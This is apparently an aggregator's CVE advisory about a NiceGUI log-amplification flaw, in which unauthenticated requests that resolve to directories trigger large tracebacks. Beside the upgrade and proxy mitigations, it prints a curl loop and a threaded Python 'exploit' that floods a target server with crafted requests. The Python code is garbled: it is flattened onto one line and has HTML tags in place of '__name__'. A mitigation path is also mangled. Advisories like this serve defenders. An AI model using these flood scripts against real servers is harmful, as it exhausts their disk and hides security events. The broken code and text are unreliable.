Listen to this Post
Two FastAPI routes in NiceGUI—the per‑component resource route (added in v1.4.6) and the ESM module route (added in v3.0.0)—accept a user‑controlled sub‑path parameter. Each route joins this sub‑path with a base directory and passes the result to Starlette’s FileResponse. The existing guard uses pathlib.Path.exists(), which returns `True` for directories. If the resolved sub‑path points to a directory, `FileResponse` raises an unhandled `RuntimeError` because it expects a file. FastAPI lacks a default handler for this RuntimeError, so the exception propagates to Uvicorn, which logs a full multi‑frame traceback (roughly 100 lines per request). The routes are reachable without authentication. Therefore, a remote attacker can send crafted requests that map to existing directories, triggering the exception repeatedly. This results in massive log amplification, consuming disk space, saturating log‑shipping pipelines, and causing alert fatigue. The attack has no impact on confidentiality or integrity; it only affects log‑based availability.
dailycve form:
Platform: NiceGUI
Version: <=3.11.1
Vulnerability: Log amplification
Severity: Moderate
Date: 2026‑05‑18
Prediction: Patch 2026‑05‑20
Analytics under heading What Undercode Say:
Simulate a log-amplification attack by sending 1000 crafted requests
for i in {1..1000}; do
curl -s "http://target-ip:8080/_nicegui/3.11.1/esm/dummy/missing"
done
Monitor log growth
watch -n 1 'du -h /var/log/nicegui/uvicorn.log'
Check for repeated RuntimeError traces
grep -c "RuntimeError" /var/log/nicegui/uvicorn.log
Exploit:
import requests import threading def trigger_log_flood(target_url): Craft a request that resolves to an existing directory (e.g., /) try: r = requests.get(target_url + "/_nicegui/3.11.1/esm/static") Expect HTTP 500 and a traceback in server logs except: pass if <strong>name</strong> == "<strong>main</strong>": target = "http://192.168.1.100:8080" threads = [] for _ in range(50): t = threading.Thread(target=trigger_log_flood, args=(target,)) t.start() threads.append(t) for t in threads: t.join()
Protection from this CVE:
Upgrade to NiceGUI >=3.12.0.
Until upgrade, place NiceGUI behind a reverse proxy that rejects requests with an empty sub‑path after `/_nicegui//_nicegui/<version>/resources/<key>/.
Rate‑limit the `/_nicegui/` prefix at the proxy level.
Configure aggressive log rotation for the affected service.
Impact:
A remote unauthenticated attacker can force the server to emit large tracebacks (~100 lines per request) for each crafted request. At sustained rates, this exhausts disk space, overloads log pipelines, and masks legitimate security events. No data leakage or remote code execution occurs.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

